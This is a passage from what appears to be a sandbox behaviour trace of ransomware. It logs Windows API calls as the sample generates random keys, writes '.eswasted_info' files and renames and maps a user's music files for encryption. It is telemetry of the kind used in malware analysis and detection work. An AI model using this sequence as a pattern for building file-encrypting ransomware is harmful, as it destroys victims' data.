dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0079.661] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0079.661] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.661] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0079.661] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0079.662] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.670] SetEndOfFile (hFile=0x110) returned 1 [0079.672] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0079.672] CloseHandle (hObject=0x110) returned 1 [0079.673] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e0c48 | out: hHeap=0x4a0000) returned 1 [0079.674] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0079.674] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0079.674] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.674] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\l Xy-FX1l-_.m4a") returned 68 [0079.674] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x292) returned 0x4d8aa8 [0079.674] lstrcpyW (in: lpString1=0x4d8b30, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.674] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0079.675] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0079.675] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0079.675] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.675] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\l Xy-FX1l-_.m4a.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\b7uoo2nnfirn\\l xy-fx1l-_.m4a.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0079.676] WriteFile (in: hFile=0x110, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0079.677] SetEndOfFile (hFile=0x110) returned 1 [0079.677] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.677] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0079.677] lstrcpyW (in: lpString1=0x4d8b30, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0079.677] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\l Xy-FX1l-_.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\b7uoo2nnfirn\\l xy-fx1l-_.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\l Xy-FX1l-_.m4a.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\b7uoo2nnfirn\\l xy-fx1l-_.m4a.eswasted")) returned 1 [0079.678] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\l Xy-FX1l-_.m4a.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\b7uoo2nnfirn\\l xy-fx1l-_.m4a.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0079.678] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0079.679] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0079.680] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0079.680] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.680] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0079.681] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0079.681] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.689] SetEndOfFile (hFile=0x110) returned 1 [0079.691] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0079.691] CloseHandle (hObject=0x110) returned 1 [0079.693] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d8aa8 | out: hHeap=0x4a0000) returned 1 [0079.693] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0079.694] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0079.694] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.694] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\Mu0wvzoG5BKpg9ko9Uc.m4a") returned 76 [0079.694] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2a2) returned 0x4d8aa8 [0079.694] lstrcpyW (in: lpString1=0x4d8b40, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.694] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0079.694] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0079.695] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0079.695] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.695] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\Mu0wvzoG5BKpg9ko9Uc.m4a.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\b7uoo2nnfirn\\mu0wvzog5bkpg9ko9uc.m4a.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0079.695] WriteFile (in: hFile=0x110, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0079.743] SetEndOfFile (hFile=0x110) returned 1 [0079.872] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.872] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0079.872] lstrcpyW (in: lpString1=0x4d8b40, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0079.873] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\Mu0wvzoG5BKpg9ko9Uc.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\b7uoo2nnfirn\\mu0wvzog5bkpg9ko9uc.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\Mu0wvzoG5BKpg9ko9Uc.m4a.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\b7uoo2nnfirn\\mu0wvzog5bkpg9ko9uc.m4a.eswasted")) returned 1 [0079.873] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\Mu0wvzoG5BKpg9ko9Uc.m4a.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\b7uoo2nnfirn\\mu0wvzog5bkpg9ko9uc.m4a.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0079.873] CreateFileMappingW (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0079.875] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0079.876] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d8da0 | out: pbBuffer=0x4d8da0) returned 1 [0079.876] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.876] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0079.876] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0079.876] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.909] SetEndOfFile (hFile=0x110) returned 1 [0079.911] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0079.911] CloseHandle (hObject=0x110) returned 1 [0079.913] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d8aa8 | out: hHeap=0x4a0000) returned 1 [0079.913] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0079.914] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0079.914] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.914] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\vwAdRrnkkGGOEzOxExC.mp3") returned 76 [0079.914] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2a2) returned 0x4ef6e0 [0079.914] lstrcpyW (in: lpString1=0x4ef778, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.914] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0079.914] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0079.915] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0079.915] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.915] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\vwAdRrnkkGGOEzOxExC.mp3.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\b7uoo2nnfirn\\vwadrrnkkggoezoxexc.mp3.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0079.916] WriteFile (in: hFile=0x110, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0079.917] SetEndOfFile (hFile=0x110) returned 1 [0079.917] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.917] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0079.917] lstrcpyW (in: lpString1=0x4ef778, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0079.917] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\vwAdRrnkkGGOEzOxExC.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\b7uoo2nnfirn\\vwadrrnkkggoezoxexc.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\vwAdRrnkkGGOEzOxExC.mp3.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\b7uoo2nnfirn\\vwadrrnkkggoezoxexc.mp3.eswasted")) returned 1 [0079.918] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\vwAdRrnkkGGOEzOxExC.mp3.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\b7uoo2nnfirn\\vwadrrnkkggoezoxexc.mp3.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0079.918] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0079.921] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0079.922] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0079.922] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.922] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0079.922] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0079.922] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.934] SetEndOfFile (hFile=0x110) returned 1 [0079.977] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0079.977] CloseHandle (hObject=0x110) returned 1 [0079.979] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef6e0 | out: hHeap=0x4a0000) returned 1 [0079.979] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0079.980] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0079.980] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.980] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eqw8LMd-zpDrV.mp3") returned 57 [0079.980] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x27c) returned 0x4ef6e0 [0079.980] lstrcpyW (in: lpString1=0x4ef752, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.980] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0079.981] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0079.981] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e9fd8 | out: pbBuffer=0x4e9fd8) returned 1 [0079.981] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.981] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eqw8LMd-zpDrV.mp3.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\eqw8lmd-zpdrv.mp3.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0079.982] WriteFile (in: hFile=0x110, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0079.983] SetEndOfFile (hFile=0x110) returned 1 [0079.983] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.983] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0079.983] lstrcpyW (in: lpString1=0x4ef752, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0079.983] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eqw8LMd-zpDrV.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\eqw8lmd-zpdrv.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eqw8LMd-zpDrV.mp3.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\eqw8lmd-zpdrv.mp3.eswasted")) returned 1 [0079.984] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eqw8LMd-zpDrV.mp3.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\eqw8lmd-zpdrv.mp3.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0079.984] CreateFileMappingW (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0079.985] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0079.986] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0079.986] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.986] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0079.987] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0079.987] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.995] SetEndOfFile (hFile=0x110) returned 1 [0079.997] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0079.997] CloseHandle (hObject=0x110) returned 1 [0079.999] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef6e0 | out: hHeap=0x4a0000) returned 1 [0079.999] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0080.000] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0080.000] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.000] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\gAwV uzMPCc2td3R6P.m4a") returned 62 [0080.000] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x286) returned 0x4ef6e0 [0080.000] lstrcpyW (in: lpString1=0x4ef75c, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.000] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0080.000] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0080.001] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e9fd8 | out: pbBuffer=0x4e9fd8) returned 1 [0080.001] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.001] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\gAwV uzMPCc2td3R6P.m4a.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gawv uzmpcc2td3r6p.m4a.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0080.002] WriteFile (in: hFile=0x110, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0080.003] SetEndOfFile (hFile=0x110) returned 1 [0080.004] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.004] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0080.004] lstrcpyW (in: lpString1=0x4ef75c, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.004] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\gAwV uzMPCc2td3R6P.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gawv uzmpcc2td3r6p.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\gAwV uzMPCc2td3R6P.m4a.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gawv uzmpcc2td3r6p.m4a.eswasted")) returned 1 [0080.004] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\gAwV uzMPCc2td3R6P.m4a.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gawv uzmpcc2td3r6p.m4a.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0080.004] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0080.006] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0080.007] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0080.007] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.007] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0080.008] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0080.008] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.087] SetEndOfFile (hFile=0x110) returned 1 [0080.089] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0080.089] CloseHandle (hObject=0x110) returned 1 [0080.092] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef6e0 | out: hHeap=0x4a0000) returned 1 [0080.092] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0080.093] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0080.093] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.093] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\jbfd.mp3") returned 48 [0080.093] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x26a) returned 0x4ef6d0 [0080.093] lstrcpyW (in: lpString1=0x4ef730, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.093] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0080.093] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0080.094] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0080.094] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0080.094] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\jbfd.mp3.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\jbfd.mp3.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0080.095] WriteFile (in: hFile=0x110, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0080.096] SetEndOfFile 